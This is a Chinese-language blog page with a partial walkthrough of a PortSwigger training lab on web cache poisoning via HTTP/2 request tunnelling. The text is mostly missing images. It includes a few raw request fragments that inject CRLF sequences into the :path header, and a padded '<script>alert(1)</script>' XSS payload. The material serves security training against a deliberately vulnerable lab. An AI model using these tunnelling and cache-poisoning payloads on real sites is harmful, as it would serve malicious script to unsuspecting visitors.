某不知名博客 某不知名博客
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)

Carsaid

安全界的小学生
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)
  • 前言

  • 服务器端主题(翻译)

  • 客户端主题(翻译)

  • 高级主题(翻译)

  • 扩展阅读(翻译)

  • 个人学习笔记

  • 实验室做题记录

    • 实验室做题记录
    • 服务器端

    • 客户端

    • 高级主题

      • 不安全的反序列化

      • GraphQL API漏洞

      • 服务端模板注入

      • Web缓存投毒

      • HTTP主机头攻击

      • HTTP请求走私

        • 从业者-基本CL.TE漏洞
        • 从业者-基本TE.CL漏洞
        • 从业者-混淆TE标头
        • 从业者-响应差异-确认CL.TE漏洞
        • 从业者-响应差异-确认TE.CL漏洞
        • 从业者-利用请求走私-CL.TE绕过前端安全控制
        • 从业者-利用请求走私-TE.CL绕过前端安全控制
        • 从业者-利用请求走私-披露前端请求重写
        • 从业者-利用请求走私-捕获其他用户的请求
        • 从业者-利用请求走私-传递反射型XSS
        • 专家-利用请求走私-执行Web缓存投毒
        • 专家-利用请求走私-执行Web缓存欺骗
        • 从业者-高级请求走私-H2.CL请求走私
        • 从业者-响应队列投毒-H2.TE请求走私
        • 从业者-CRLF请求走私
        • 从业者-CRLF请求拆分
        • 专家-H2请求隧道-绕过访问控制
        • 专家-H2请求隧道-Web缓存投毒
          • 题目
          • 实操
        • 从业者-浏览器驱动的请求走私-CL.0请求走私
        • 专家-浏览器驱动的请求走私-客户端异步
        • 专家-浏览器驱动的请求走私-基于暂停的服务端请求走私
      • OAuth身份验证漏洞

      • JWT攻击

      • 原型链污染

  • BurpSuite及官方实验室
  • 实验室做题记录
  • 高级主题
  • HTTP请求走私
carsaid
2024-01-26
目录

专家-H2请求隧道-Web缓存投毒

# 实验室:通过HTTP/2请求隧道实现Web缓存投毒

# 题目

此实验室容易受到请求走私的攻击,因为前端服务器会降级 HTTP/2 请求,并且无法充分清理所传入的标头。

若要解决实验室问题,请毒害缓存,当受害者访问主页时,使他们的浏览器执行alert(1)。受害用户每 15 秒访问一次主页。

前端服务器不会复用与后端的连接,因此不易受到经典的请求走私攻击。但是,它仍然容易受到请求隧道 (opens new window)的攻击。

实验室-专家

通过HTTP/2请求隧道实现Web缓存投毒 >>

- name: 实验室-专家
  desc: 通过HTTP/2请求隧道实现Web缓存投毒 >>
  avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
  link: https://portswigger.net/web-security/request-smuggling/advanced/request-tunnelling/lab-request-smuggling-h2-web-cache-poisoning-via-request-tunnelling
  bgColor: '#001350'
  textColor: '#d112fe'
1
2
3
4
5
6

# 实操

(目前只有图,文字后面有时间补)

点击 “ACCESS THE LAB” 进入实验室。

Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image

:path

Not Found Image
 HTTP/2\r\n
\r\n
GET / HTTP/1.1\r\n
\r\n
Host: ...
Foo: x

↓↓↓

HEAD /?x=2 HTTP/2
Host: 0ae100ba04515ede84d8c35f004800e7.web-security-academy.net

GET / HTTP/1.1
Host: 0ae100ba04515ede84d8c35f004800e7.web-security-academy.net
Foo: xHTTP/2
1
2
3
4
5
6
Not Found Image
 HTTP/1.1\r\n
\r\n
GET / HTTP/1.1\r\n
\r\n
Foo: x

↓↓↓

HEAD /?x=3 HTTP/1.1
Host: 0ae100ba04515ede84d8c35f004800e7.web-security-academy.net

GET / HTTP/1.1
Foo: xHTTP/2
1
2
3
4
5
Not Found Image
 HTTP/1.1\r\n
\r\n
GET /
Not Found Image Not Found Image
<script>alert(1)/*x(855)aaa(7740)yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy*/</script>
1
Not Found Image Not Found Image
/ HTTP/1.1\r\n
\r\n
GET /<载荷>
Not Found Image Not Found Image Not Found Image
编辑 (opens new window)
专家-H2请求隧道-绕过访问控制
从业者-浏览器驱动的请求走私-CL.0请求走私

← 专家-H2请求隧道-绕过访问控制 从业者-浏览器驱动的请求走私-CL.0请求走私→

最近更新
01
API测试笔记
04-30
02
msfvenom
03-29
03
Metasploit
03-29
更多文章>
Theme by Vdoing | Copyright © 2023-2024 Carsaid | MIT License
  • 跟随系统
  • 浅色模式
  • 深色模式
  • 阅读模式